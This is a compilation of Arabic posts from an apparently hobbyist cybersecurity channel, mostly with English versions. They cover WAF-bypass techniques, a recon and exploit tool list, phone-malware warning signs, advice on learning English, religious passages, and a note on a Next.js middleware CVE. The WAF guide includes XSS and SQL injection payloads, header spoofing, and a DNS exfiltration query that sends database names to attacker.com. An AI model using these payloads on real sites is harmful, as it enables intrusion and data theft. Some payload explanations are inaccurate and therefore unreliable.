تعالو نتكلم عن موضوع مهم جدا و الي

هو ازاي نعمل bypass لي

waf ( web application firewall )

تحذير :

1 : القناه غير مسؤوله عن اي فعل خارج لاطار التعليمي

2 : ممنوع نشر المقال دون ذكر اسم القال يكمن نشر المعلومه ولكن لا يمكن نشر الكتابه بحد ذاتها الي ب اذن من صاحب قناه


نفترض عندنا سيناريو ل واحد نسمي

حماصه حماصه كان قعد يهنت ولقي ثغره

sql injection

شرح سريع : sql injection دي بتحقن

بايلود في اكواد sql بتاع موقع عشان

تسحب داتا خاصه

المهم حماصه لما جه يستغل ثغره معرفش

معرفش يعملها exploit بسبب waf

طيب حماصه يعمل اي ؟

انا هقولك ✨

اول حاجه : حماصه يجرب يلعب في

بايلود يعمل encode بختصار

طب زي اي يا سبايدر 🤔

زي بايلود xss

<script>alert(1)</script>

نفسو بعد ما تعمل encode url

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E

بايلود وقتها بيشتغل عادي كنو نفس لاول

طيب نفرض مش اشتغل 🤔

تاني خطوه :

تلاعب في headers

اي التلاعب في الهيدر دي ؟

شوف تلاعب في الهيدر بتكون انك تحاول

تغير حمايه زي X-Original-URL

طيب ازاي 🤔

بسيطه

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

طيب نفرض انها مش اشتغلت نعمل اي ؟

نيجي لي خطوه تالته :

نجرب نعدل ف HTTP ممكن نخلي

TRACE
و يشتغل معانا

مثال

HEAD /admin HTTP/1.1
او
TRACE /admin HTTP/1.1

بدل get او post

طيب نفترض مش اشتغلت 🤔

نيجي لي طريقه الرابعه :

الخطوه دي شبه الي فاتت ولكن انت

هتجرب تعدل الملف يكون مثلا xml

مثال :
/admin.json

طيب نفترض مش اشتغلت 😂🤔

هقولك بردو في خطوه خامسه 😂

الخطوه الخامسه :

و دي بسيطه في waf بيكون مش عارف

يفرق بين الحروف الصغيره من حروف
الكبير

بتهزر يا سبايدر يعني waf طلع غبي كد

هقولك ايو مثال

<script>alert(1)</script>

دا كود xss عادي

<Script>alert(1)</Script>

هو نفس الكود بنفس الطريقه

طيب نفترض مش اشتغلت 🤔

هقولك في طريقه سادسه :


الطريقه دي ممكن تتلاعب ف dns خاص

بل موقع

مثال :

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));

دا بايلود عادي

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

بعد تعديل

طيب لو نجحت ؟

اخر طريقه و هيا السابعه :

شوف اصدار waf و دور علي cve لي

و جرب cve كلهم لحد ما تقدر تعمل bypass

شكرا ل قرائه المقال حاولت اكون خفيف و ملم بكل شئ 🤍

Bypassing WAF (Web Application Firewall): A Practical Guide

Disclaimer:

1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.


2. You may share the knowledge but do not copy this article without permission from the author.




---

Introduction

Let's imagine a scenario where a hacker, whom we’ll call Hamasah, discovers a SQL Injection vulnerability on a target website.

Quick Explanation:

SQL Injection allows attackers to inject malicious SQL queries into an application’s database to extract sensitive information.

However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).

So, what should Hamasah do? 🤔

Let's explore different WAF bypass techniques step by step.


---

1. Encoding the Payload

One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAF’s predefined signatures.

Example: XSS Encoding

Original Payload:

<script>alert(1)</script>

Encoded Payload (URL Encoding):

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E


In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.


---

2. Header Manipulation

Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.

Example: Spoofing X-Forwarded-For

Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.


---

3. HTTP Method Manipulation

Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.

Example:

HEAD /admin HTTP/1.1

or

TRACE /admin HTTP/1.1

Some WAFs do not inspect these methods as strictly as GET/POST.


---

4. Switching to Alternative Data Formats

If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.

Example:

Instead of:

username=admin' OR 1=1 --

Try sending it as JSON:

{ "username": "admin' OR 1=1 --", "password": "password" }

Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.


---

5. Case Manipulation

Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.

Example: XSS Attack Case Manipulation

Normal Payload:

<script>alert(1)</script>

Bypass Attempt:

<Script>alert(1)</Script>


If the WAF only blocks lowercase "script", the uppercase version might go through.


---

6. Exploiting DNS-based Exfiltration

Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.

Example:

Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));

or

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.


---

7. Finding WAF Vulnerabilities (CVE Exploits)

The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.

Steps:

1. Identify the WAF using tools like WAFW00F:

wafw00f http://target.com


2. Search for CVEs related to that WAF.


3. Exploit known vulnerabilities to bypass or disable the WAF.



For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.


---

Conclusion

WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.

If one method doesn't work, try another approach—because there’s always a way!

Would you like me to help you turn this into a video script or add more advanced techniques?

ازاي اعرف اني مخترق


غالبًا الهاتف بيعلق لأن بعض التطبيقات بتستهلك كمية كبيرة من الإنترنت. لحل المشكلة دي، يُستحسن تحميل تطبيق زي GlassWire علشان تراقب استهلاك البيانات. لو لاحظت إن في تطبيق بيستهلك بيانات بشكل غير طبيعي من غير سبب واضح، ده ممكن يكون بسبب برنامج ضار بيرتبط بالإنترنت.

لو لقيت تطبيق غريب، ادخل على إعدادات الهاتف علشان تدور عليه. ليه؟ لأن بعض البرامج الضارة بتكون مخفية، زي ما ممكن تلاقي تطبيق مالوش اسم أو صورة. في الحالة دي، لازم تمسحه

بعض التطبيقات مش دايمًا مصممة علشان تسرق ملفاتك، لكنها ممكن تعرض إعلانات بشكل مفرط، حتى وانت مش فاتح التطبيق. الهدف من الإعلانات دي غالبًا بيكون الربح المادي. لو بدأت تلاقي إعلانات عشوائية في واجهة الهاتف من غير سبب، دي علامة واضحة إن في برنامج ضار على جهازك.
https://t.me/SpiderCodeCommunity1

كتابه : @Gg22rf ❤️

اللّهم كُن لأهل غزة عونًا ونصيرًا، وبدّل خوفهم أمنًا.
اللّهم اجعل لأهل غزة النصرة والعزة والغلبة والقوة والهيبة.
تعز علينا غزة ..يعز علينا عزاؤها.. اللّهم غزة حتى تطمئن.
اللّهم إنّ غزة في حِماك لا حِمى لها سِواك.
اللّهم نسألك نفحة من نفحات رحمتِك تلك التي لا تُبقي بؤسًا ، ولا حزنًا ، ولا ضيقًا ، ولا يأسًا أتت عليه إلا جعلته فرجًا وفرحًا يا الله ... ‏يارب بك تطيبُ الخواطر ومن عندك تتحقّق الأمنيات استودعناك شيئاً في خواطرنا ؛ فحققه لنا يا رب العالمين‏.

بكره اول يوم من ليله القدر ليله القدر ممكن تكون من اخر عشر تيام 🙌🏻

ب مناسبه وصولنا ل 140 هنزل ليكم افضل ادوات ريكون


Spider Tools

-----------------------

spider recon

----------------------



1 -  Amass


2 - Subfinder


3 - Assetfinder


4 - Shodan.io.com


5 -Censys.com


6 - Waybackurls


7 - Hakrawler


8 - Nmap ( خليها تفحص كل الروابط ف ملف )


9 - naabu


10 - httpx ( علشان تشوف الروابط الشغاله  )


11 - WhatWeb


12 - Wappalyzer ( اضافه في فاير فوكس )


13 - Dirsearch


14 - Arjun


15 - fuff ( لزمك اسكربت ليها )


16 - wfuzz ( زي fuff  )


17 - Burp Suite pro
☝🏻☝🏻☝🏻☝🏻☝🏻
( ضيف extension الموجوده ف متجر البرب اختار ال خمس نجوم منهم و ضيف burp bounty free و حط اسكربتات burp bounty pro )


18 - zap proxy


19 - Wireshark


20 - feroxbuster


21 - Knockpy


22 - Gobuster ( زي fuff )


23 -builtwith.com


24 - nuclei


25 - xsrfprobe


26 - webpwn3r ( بتاعت ابراهيم حجازي )


27 - RED_HAWK

28 - gbounty

(  Spider Osint  )



29 - maltego


30 - Spiderfoot



| Spider exploit |



31 - SQLmap


32 - metasploit


33 - XSStrike

34 - wpscan

35 -https://github.com/vavkamil/awesome-bugbounty-tools
☝🏻☝🏻☝🏻☝🏻☝🏻
( دول ادوات زياده عشان لو في ثغره لقيتها و لادوات مش نافعه معك  )

On the occasion of reaching 140, I’m sharing with you the best reconnaissance tools!

Spider Tools


---

Spider Recon


---

1 - Amass
2 - Subfinder
3 - Assetfinder
4 - Shodan.io
5 - Censys.com
6 - Waybackurls
7 - Hakrawler
8 - Nmap (Make it scan all URLs in a file)
9 - Naabu
10 - Httpx (To check for live URLs)
11 - WhatWeb
12 - Wappalyzer (Firefox extension)
13 - Dirsearch
14 - Arjun
15 - Ffuf (You’ll need a script for it)
16 - Wfuzz (Similar to Ffuf)
17 - Burp Suite Pro
☝🏻☝🏻☝🏻☝🏻☝🏻
(Add the extensions from the Burp store, choose the five-star ones, add Burp Bounty Free, and import Burp Bounty Pro scripts.)
18 - ZAP Proxy
19 - Wireshark
20 - Feroxbuster
21 - Knockpy
22 - Gobuster (Similar to Ffuf)
23 - BuiltWith.com
24 - Nuclei
25 - XSRFProbe
26 - WebPwn3r (By Ibrahim Hegazy)
27 - RED_HAWK
28 - GBounty

Spider OSINT

29 - Maltego
30 - SpiderFoot

Spider Exploit

31 - SQLmap
32 - Metasploit
33 - XSStrike
34 - WPScan
35 - Awesome Bug Bounty Tools
☝🏻☝🏻☝🏻☝🏻☝🏻
(Additional tools in case you find a vulnerability and need extra resources.)

تعالو نتكلم ازاي تتعلم انجليزي ✨


لحظه بس هو لانجليزي مهم اصلا ؟

طبعا يعزيزي السوال دا لو كنت سالتني

في سنه 900 كنت هقولك لا بس في 2025 مهم جدا

بص لانجليزي بعيد عن السايبر سكيورتي فا هو بيدخل في كذا مجال تعليمي و منهم

لامن السيبراني موضوع اليوم

تحذير : ممنوع سرقه المقال لكن يحق لك اخد المعلومات مع ذكر المصدر

طيب يعزيزي اول حاجه لانجليزي لي

مستويات انت و انت بتتعلم في مدرسه

كنت بتاخد A B C صح ؟

فحال لو قولت صح يبقي انت كد عديت مستوي A1

اي هو A1

دا يعزيزي مستوي من مستويات لانجليزي و مستويات لانجليزي معموله عشان تحدد مستواك قبل ما تبداء تتعلم انجليزي حدد مستواك في

طيب احدد ازاي 🤔

بسيطه ادخل علي فيديو دا

https://youtu.be/NzTEZgFEr9k?si=ZZsHgaYqwcSzfolX

بعدها بعد ما تحدد ابداء شوف انت مستوي اي نفترض انك مستوي A2

تبداء تكون جمل بسيطه مع حفظ كلمات العاديه زي مثلا

تفاحه : apple

انا : I

اريد : want

تبداء بل كلمات تكون جمله

I want apple

انا اريد تفاحه

طيب اتعلم ازاي بسهوله ؟

هجبلك مثال حلو يعزيزي الطفل لما يجي يتعلم الكلام بيشوف لاشخاص الي مع بيتكلمو ازاي يعني نفترض بيتكلمو عربي الطفل يتكلم عربي

طبق مثال دا عليك كنك طفل بظبط هتبداء تخلي كل حاجه بل لغه انجليزيه

مثلا بتفرج علي فيلم بلغه لانجليزي مش تستخدم مترجم

طيب انا افهم فيلم ازاي ؟

كلمات الي انت مش فاهمه روح دور عليها و احفظها الناس المتغربين من دول عربيه بيشوفو الترجمه بل لغه لانجليزي عشان لما يشوفو الكتابه و هما مش فاهمين الكلام يدورو و يفهمو

طيب انا هستفاد اي لما اتعلم انجليزي في لامن السيبراني

بعيد عنك هتعرف تكتب و هتفهم المشاكل ( error ) و هتعرف تحل المشكله بنفسك

بس في مجالات محتاجه لغات زي malware dev ( صناعه البرمجيات الخبيثة )

لزم تبقي متعلم انجليزي عشان تعرف تكتب لاكواد .


حاولت اكون ملم بكل شئ شكرا لي قرائه المقال اتمني تشيرو القناه و اشوفكم علي خير 🤍

Let’s Talk About Learning English ✨

Is English Even Important?

Look, if you had asked me this question in the year 900, I would have said “No.” But in 2025? English is very important!

Aside from cybersecurity, English plays a major role in almost every educational field—whether you want to work in programming, science, or even travel abroad.

But since today’s topic is cybersecurity, let me explain why English is essential in this field.

⚠ Warning: Copying this article is not allowed, but you can take information from it as long as you mention the source.

English Language Levels

In school, you probably learned A, B, C, right? If your answer is "yes," then you’ve already passed A1 level!

But what is A1? Simply put, it’s the first stage of learning English. There are six main levels:
✅ A1 (Beginner) – You know the basics.
✅ A2 (Elementary) – You can form simple sentences.
✅ B1 (Intermediate) – You can understand and talk about daily topics.
✅ B2 (Upper Intermediate) – You speak more fluently.
✅ C1 (Advanced) – You understand complex texts.
✅ C2 (Proficient) – You speak almost like a native speaker.

How to Determine Your Level?

It’s simple! Take this test:
🔗 English Level Test

Once you determine your level, you can start learning accordingly. For example, if your level is A2, begin by memorizing common words like:

🍏 Apple

I 🙋🏻

Want 🫳🏻


Then, try forming a sentence:
I want an apple

How to Learn Easily?

The best way is to treat yourself like a child learning a new language:
✅ Change your phone’s language to English.
✅ Watch movies without subtitles. If you don’t understand a word, look it up and memorize it.
✅ Use English subtitles instead of Arabic, so you can link words to their correct pronunciation.

Why Is English Important in Cybersecurity?

You’ll be able to understand and fix errors by yourself.

You’ll read the documentation of the tools you use.

Some fields, like Malware Development, require you to understand technical terms and write correct code.


Conclusion

Learning English is not a luxury; it’s an essential skill in any field, especially cybersecurity. Start with small steps, and over time, you’ll see significant improvement.

If you found this article helpful, share it with your friends, and if you have any questions, feel free to ask in the comments! 🤍

ٱلۡحَمۡدُ لِلَّهِ ٱلَّذِيٓ أَنزَلَ عَلَىٰ عَبۡدِهِ ٱلۡكِتَٰبَ وَلَم يَجۡعَل لَّهُۥ عِوَجَاۜ (1) قَيِّمٗا لِّيُنذِرَ بَأۡسٗا شَدِيدٗا مِّن لَّدُنۡهُ وَيُبَشِّرَ ٱلۡمُؤۡمِنِينَ ٱلَّذِينَ يَعۡمَلُونَ ٱلصَّٰلِحَٰتِ أَنَّ لَهُمۡ أَجۡرًا حَسَنٗا (2) مَّٰكِثِينَ فِيهِ أَبَدٗا (3) وَيُنذِرَ ٱلَّذِينَ قَالُواْ ٱتَّخَذَ ٱللَّهُ وَلَدٗا (4) مَّا لَهُم بِهِۦ مِنۡ عِلۡمٖ وَلَا لِأٓبَآئِهِمۡۚ كَبُرَتۡ كَلِمَةٗ تَخۡرُجُ مِنۡ أَفۡوَٰهِهِمۡۚ إِن يَقُولُونَ إِلَّا كَذِبٗا (5) فَلَعَلَّكَ بَٰخِعٞ نَّفۡسَكَ عَلَىٰٓ ءَاثَٰرِهِمۡ إِن لَّمۡ يُؤۡمِنُواْ بِهَٰذَا ٱلۡحَدِيثِ أَسَفًا (6) إِنَّا جَعَلۡنَا مَا عَلَى ٱلۡأَرۡضِ زِينَةٗ لَّهَا لِنَبۡلُوَهُمۡ أَيُّهُمۡ أَحۡسَنُ عَمَلٗا (7) وَإِنَّا لَجَٰعِلُونَ مَا عَلَيۡهَا صَعِيدٗا جُرُزًا (8) أَمۡ حَسِبۡتَ أَنَّ أَصۡحَٰبَ ٱلۡكَهۡفِ وَٱلرَّقِيمِ كَانُواْ مِنۡ ءَايَٰتِنَا عَجَبًا (9) إِذۡ أَوَى ٱلۡفِتۡيَةُ إِلَى ٱلۡكَهۡفِ فَقَالُواْ رَبَّنَآ ءَاتِنَا مِن لَّدُنكَ رَحۡمَةٗ وَهَيِّئۡ لَنَا مِنۡ أَمۡرِنَا رَشَدٗا (10) فَضَرَبۡنَا عَلَىٰٓ ءَاذَانِهِمۡ فِي ٱلۡكَهۡفِ سِنِينَ عَدَدٗا (11) ثُمَّ بَعَثۡنَٰهُمۡ لِنَعۡلَمَ أَيُّ ٱلۡحِزۡبَيۡنِ أَحۡصَىٰ لِمَا لَبِثُوٓاْ أَمَدٗا (12) نَّحۡنُ نَقُصُّ عَلَيۡكَ نَبَأَهُم بِٱلۡحَقِّۚ إِنَّهُمۡ فِتۡيَةٌ ءَامَنُواْ بِرَبِّهِمۡ وَزِدۡنَٰهُمۡ هُدٗى (13) وَرَبَطۡنَا عَلَىٰ قُلُوبِهِمۡ إِذۡ قَامُواْ فَقَالُواْ رَبُّنَا رَبُّ ٱلسَّمَٰوَٰتِ وَٱلۡأَرۡضِ لَن نَّدۡعُوَاْ مِن دُونِهِۦٓ إِلَٰهٗاۖ لَّقَدۡ قُلۡنَآ إِذٗا شَطَطًا (14) هَٰٓؤُلَآءِ قَوۡمُنَا ٱتَّخَذُواْ مِن دُونِهِۦٓ ءَالِهَةٗۖ لَّوۡلَا يَأۡتُونَ عَلَيۡهِم بِسُلۡطَٰنِۭ بَيِّنٖۖ فَمَنۡ أَظۡلَمُ مِمَّنِ ٱفۡتَرَىٰ عَلَى ٱللَّهِ كَذِبٗا (15) وَإِذِ ٱعۡتَزَلۡتُمُوهُمۡ وَمَا يَعۡبُدُونَ إِلَّا ٱللَّهَ فَأۡوُۥٓاْ إِلَى ٱلۡكَهۡفِ يَنشُرۡ لَكُمۡ رَبُّكُم مِّن رَّحۡمَتِهِۦ وَيُهَيِّئۡ لَكُم مِّنۡ أَمۡرِكُم مِّرۡفَقٗا (16) ۞وَتَرَى ٱلشَّمۡسَ إِذَا طَلَعَت تَّزَٰوَرُ عَن كَهۡفِهِمۡ ذَاتَ ٱلۡيَمِينِ وَإِذَا غَرَبَت تَّقۡرِضُهُمۡ ذَاتَ ٱلشِّمَالِ وَهُمۡ فِي فَجۡوَةٖ مِّنۡهُۚ ذَٰلِكَ مِنۡ ءَايَٰتِ ٱللَّهِۗ مَن يَهۡدِ ٱللَّهُ فَهُوَ ٱلۡمُهۡتَدِۖ وَمَن يُضۡلِلۡ فَلَن تَجِدَ لَهُۥ وَلِيّٗا مُّرۡشِدٗا (17) وَتَحۡسَبُهُمۡ أَيۡقَاظٗا وَهُمۡ رُقُودٞۚ وَنُقَلِّبُهُمۡ ذَاتَ ٱلۡيَمِينِ وَذَاتَ ٱلشِّمَالِۖ وَكَلۡبُهُم بَٰسِطٞ ذِرَاعَيۡهِ بِٱلۡوَصِيدِۚ لَوِ ٱطَّلَعۡتَ عَلَيۡهِمۡ لَوَلَّيۡتَ مِنۡهُمۡ فِرَارٗا وَلَمُلِئۡتَ مِنۡهُمۡ رُعۡبٗا (18) وَكَذَٰلِكَ بَعَثۡنَٰهُمۡ لِيَتَسَآءَلُواْ بَيۡنَهُمۡۚ قَالَ قَآئِلٞ مِّنۡهُمۡ كَمۡ لَبِثۡتُمۡۖ قَالُواْ لَبِثۡنَا يَوۡمًا أَوۡ بَعۡضَ يَوۡمٖۚ قَالُواْ رَبُّكُمۡ أَعۡلَمُ بِمَا لَبِثۡتُمۡ فَٱبۡعَثُوٓاْ أَحَدَكُم بِوَرِقِكُمۡ هَٰذِهِۦٓ إِلَى ٱلۡمَدِينَةِ فَلۡيَنظُرۡ أَيُّهَآ أَزۡكَىٰ طَعَامٗا فَلۡيَأۡتِكُم بِرِزۡقٖ مِّنۡهُ وَلۡيَتَلَطَّفۡ وَلَا يُشۡعِرَنَّ بِكُمۡ أَحَدًا (19) إِنَّهُمۡ إِن يَظۡهَرُواْ عَلَيۡكُمۡ يَرۡجُمُوكُمۡ أَوۡ يُعِيدُوكُمۡ فِي مِلَّتِهِمۡ وَلَن تُفۡلِحُوٓاْ إِذًا أَبَدٗا (20) وَكَذَٰلِكَ أَعۡثَرۡنَا عَلَيۡهِمۡ لِيَعۡلَمُوٓاْ أَنَّ وَعۡدَ ٱللَّهِ حَقّٞ وَأَنَّ ٱلسَّاعَةَ لَا رَيۡبَ فِيهَآ إِذۡ يَتَنَٰزَعُونَ بَيۡنَهُمۡ أَمۡرَهُمۡۖ فَقَالُواْ ٱبۡنُواْ عَلَيۡهِم بُنۡيَٰنٗاۖ رَّبُّهُمۡ أَعۡلَمُ بِهِمۡۚ قَالَ ٱلَّذِينَ غَلَبُواْ عَلَىٰٓ أَمۡرِهِمۡ لَنَتَّخِذَنَّ عَلَيۡهِم مَّسۡجِدٗا (21) سَيَقُولُونَ ثَلَٰثَةٞ رَّابِعُهُمۡ كَلۡبُهُمۡ وَيَقُولُونَ خَمۡسَةٞ سَادِسُهُمۡ كَلۡبُهُمۡ رَجۡمَۢا بِٱلۡغَيۡبِۖ وَيَقُولُونَ سَبۡعَةٞ وَثَامِنُهُمۡ كَلۡبُهُمۡۚ قُل رَّبِّيٓ أَعۡلَمُ بِعِدَّتِهِم مَّا يَعۡلَمُهُمۡ إِلَّا قَلِيلٞۗ فَلَا تُمَارِ فِيهِمۡ إِلَّا مِرَآءٗ ظَٰهِرٗا وَلَا تَسۡتَفۡتِ فِيهِم مِّنۡهُمۡ أَحَدٗا (22) وَلَا تَقُولَنَّ لِشَاْيۡءٍ إِنِّي فَاعِلٞ ذَٰلِكَ غَدًا (23) إِلَّآ أَن يَشَآءَ ٱللَّهُۚ وَٱذۡكُر رَّبَّكَ إِذَا نَسِيتَ وَقُلۡ عَسَىٰٓ أَن يَهۡدِيَنِ رَبِّي لِأَقۡرَبَ مِنۡ هَٰذَا رَشَدٗا (24) وَلَبِثُواْ فِي كَهۡفِهِمۡ ثَلَٰثَ مِاْئَةٖ سِنِينَ وَٱزۡدَادُواْ تِسۡعٗا (25) قُلِ ٱللَّهُ أَعۡلَمُ بِمَا لَبِثُواْۖ لَهُۥ غَيۡبُ ٱلسَّمَٰوَٰتِ وَٱلۡأَرۡضِۖ أَبۡصِرۡ بِهِۦ وَأَسۡمِعۡۚ مَا لَهُم مِّن دُونِهِۦ مِن وَلِيّٖ وَلَا يُشۡرِكُ فِي حُكۡمِهِۦٓ أَحَدٗا (26) وَٱتۡلُ مَآ أُوحِيَ إِلَيۡكَ مِن كِتَابِ رَبِّكَۖ لَا مُبَدِّلَ لِكَلِمَٰتِهِۦ وَلَن تَجِدَ مِن دُونِهِۦ مُلۡتَحَدٗا (27) وَٱصۡبِرۡ نَفۡسَكَ مَعَ ٱلَّذِينَ يَدۡعُونَ رَبَّهُم بِٱلۡغَدَوٰةِ وَٱلۡعَشِيِّ يُرِيدُونَ وَجۡهَهُۥۖ وَلَا

طلب بسيط ادعو لي والدتي بالشفاء عشان هتعمل عمليه كبيره

ان شاء الله ناوي انزل طريقه ازاي تجيب اضافات البرب برو بدون البرب برو

حد عايز طريقه 👀

2.2 ✅

فيه باحثين أمنيين (رشيد وياسر علام) اكتشفوا ثغرة خطيرة في الـ Middleware بتاع Next.js — واللي هو الكود اللي بيتنفذ قبل ما الطلب يوصل للـ API أو الصفحة، وبيستخدموه مثلًا في التحقق من الصلاحيات.

الثغرة كانت ببساطة إنك لو ضفت هيدر معين في الطلب (x-middleware-subrequest) وكتبت فيه اسم الـ Middleware... الكود بيتجهل الطلب تمامًا وبيعديه كأن مفيش أي تحقق أصلاً!
يعني تقدر تعدي على الـ Auth، توصل لصفحات محمية، أو حتى تعمل XSS أو تخرب الكاش بتاع السيرفر و الخطير إن كل ده بيحصل من غير ما السيرفر يحس بأي حاجة غلط.

الثغرة دي اتسجلت بـ CVE-2025-29927
ونصيحة لأي حد شغال بـ Next.js حدّث للنسخة الجديدة فورًا، خصوصًا لو بتستخدم Middleware


شرح :

https://youtu.be/AaCnBOqyvIM?si=8u4JwWkFObQLfIle
مصدر :
https://www.facebook.com/share/p/1AFN1pgKUV/